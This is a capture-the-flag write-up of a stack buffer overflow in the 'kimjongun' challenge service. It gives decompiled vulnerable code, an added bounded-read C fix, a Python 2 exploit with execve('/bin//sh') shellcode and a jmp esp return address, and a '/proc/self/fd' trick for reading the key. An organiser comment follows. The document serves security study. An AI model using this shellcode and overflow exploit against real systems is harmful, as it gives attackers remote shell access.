The binary was running at kimjongun.final2012.ghostintheshellcode.com:2645
Summary: buffer overflow, reversing
The file is an x86 ELF. First it asks for a password; the password can be anything except "HansBrix!!!", and the read is limited to 0xc bytes.
After that it is the usual warm-up buffer overflow task.
The main function has a buffer overflow:
signed int __cdecl check_func()
{
    int flag; // edx@1
    signed int result; // eax@1
    char buffer[512]; // [sp+10h] [bp-208h]@1

    memset(buffer, 0, sizeof(buffer));
    SendToUser(fd, "Password: ");
    ReadFromUser(fd, buffer, 0xCu, 10);         // password read is capped at 0xC bytes
    flag = strncmp(buffer, s2, 0xCu);
    result = 1;
    if ( flag )                                  // any password other than s2 takes this path
    {
        SendToUser(fd, "Welcome shitty wok, may a taka oda prez?\n");
        ReadFromUser(fd, buffer, 0x240u, 0xAu);  // 0x240 bytes into a 512 (0x200) byte buffer: stack overflow
        SendToUser(fd, "Goddamn Mongorians! Quit breakin down my shitty wall!!!\n");
        result = 0;
    }
    return result;
}
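The defensive counterpart, added here as an example and not code from the challenge binary or this writeup: a bounded line reader whose limit comes from the buffer itself instead of the hard-coded 0x240. The names read_line_bounded, read_answer and demo_overlong_input are my own; the pipe input is constructed to stand in for the client socket.

```c
#include <string.h>
#include <unistd.h>
#include <sys/types.h>

#define BUF_SIZE 512   /* the size of check_func's stack buffer */
#define DELIM    '\n'  /* 0x0A, the delimiter passed to ReadFromUser */

/* Read at most cap-1 bytes from fd, stopping at delim (not stored) or EOF,
 * and always NUL-terminate.  Returns bytes stored, or -1 on read error.
 * The bound is the caller's real buffer size, so unlike the 0x240 request in
 * check_func the read can never run past the buffer into saved ebp/eip. */
ssize_t read_line_bounded(int fd, char *buf, size_t cap, char delim)
{
    size_t n = 0;
    if (cap == 0) return -1;
    while (n < cap - 1) {
        char c;
        ssize_t r = read(fd, &c, 1);
        if (r < 0) return -1;
        if (r == 0 || c == delim)
            break;
        buf[n++] = c;
    }
    buf[n] = '\0';
    return (ssize_t)n;
}

/* Hardened shape of check_func's second read: the length is sizeof(buffer). */
ssize_t read_answer(int fd, char *buffer, size_t buflen)
{
    memset(buffer, 0, buflen);
    return read_line_bounded(fd, buffer, buflen, DELIM);
}

/* Push input_len bytes of 'A' plus a newline through a pipe (constructed
 * input) and report how many bytes land in a BUF_SIZE stack buffer. */
ssize_t demo_overlong_input(size_t input_len)
{
    int p[2];
    char buffer[BUF_SIZE], a = 'A';
    if (pipe(p) != 0) return -1;
    for (size_t i = 0; i < input_len; i++)
        write(p[1], &a, 1);
    write(p[1], "\n", 1);
    close(p[1]);
    ssize_t got = read_answer(p[0], buffer, sizeof(buffer));
    close(p[0]);
    return got;
}
```

With the challenge's 0x240-byte request, only 511 bytes are stored and the rest is left unread; the saved frame pointer and return address are never touched.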
And this is the exploit (Python 2):

from socket import create_connection
import sys

if __name__ == "__main__":
    sock = create_connection(('kimjongun.final2012.ghostintheshellcode.com', 2645))
    print sock.recv(1024)
    fake = sys.stdin.readline()    # wait for Enter before sending anything
    sock.send("HansBrix!!!\n")
    print sock.recv(1024)
    #0xbfe86d0c - ret addr
    # shellcode: dup2 the client socket fd (5) onto 0, 1 and 2, then execve("/bin//sh")
    payload = "\x6A\x05\x5F\x89\xfb\x6a\x02\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x6a"
    payload += "\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
    payload += "\x89\xe3\x52\x53\x89\xe1\xcd\x80"
    #08048853 - jmp esp
    ret2 = '\x53\x88\x04\x08'
    # buffer sits at bp-0x208, so 0x1fc + 0x10 = 0x20c is the saved return address;
    # the jmp esp there lands on the second copy of the shellcode right after it
    buff = b'\x90'*(0x1fc-len(payload)) + payload + b'\x90'*0x10 + ret2 + payload + b'\x0a'
    sock.send(buff)
    buff = b'ls -la' + b'\x0a'
    sock.send(buff)
    print sock.recv(1024)
But once you get a shell, finding the key is a problem. Instead of the key I found a photo of a pretty guy from PPP :)
If you want the real key, you have to look at the handle of the open key file. Something like this =)
cat /proc/self/fd/4
Bingo!
1 comment
In hindsight, we should have had it chrooted w/o proc and we should not have had the “new” key overlay mounted over the old one. That confused too many people. You did correctly find the open handle which was exactly the point, but the intention was to have folks write shellcode to use the parent’s FD and read the key that way.
In hindsight, we think we should have just had the binary run as root, open the file (only readable by root), drop-privs, then listen on the socket (also chroot so no /proc).
That would have forced people to achieve what we were hoping for and made it less of an easter-egg hunt as to what the goal was.
One bit of trivia: this was a hat-tip to the original kimjongd binary from Defcon Finals in 2007. It’s also got a sneaky reference in the IDA Pro book by Chris Eagle.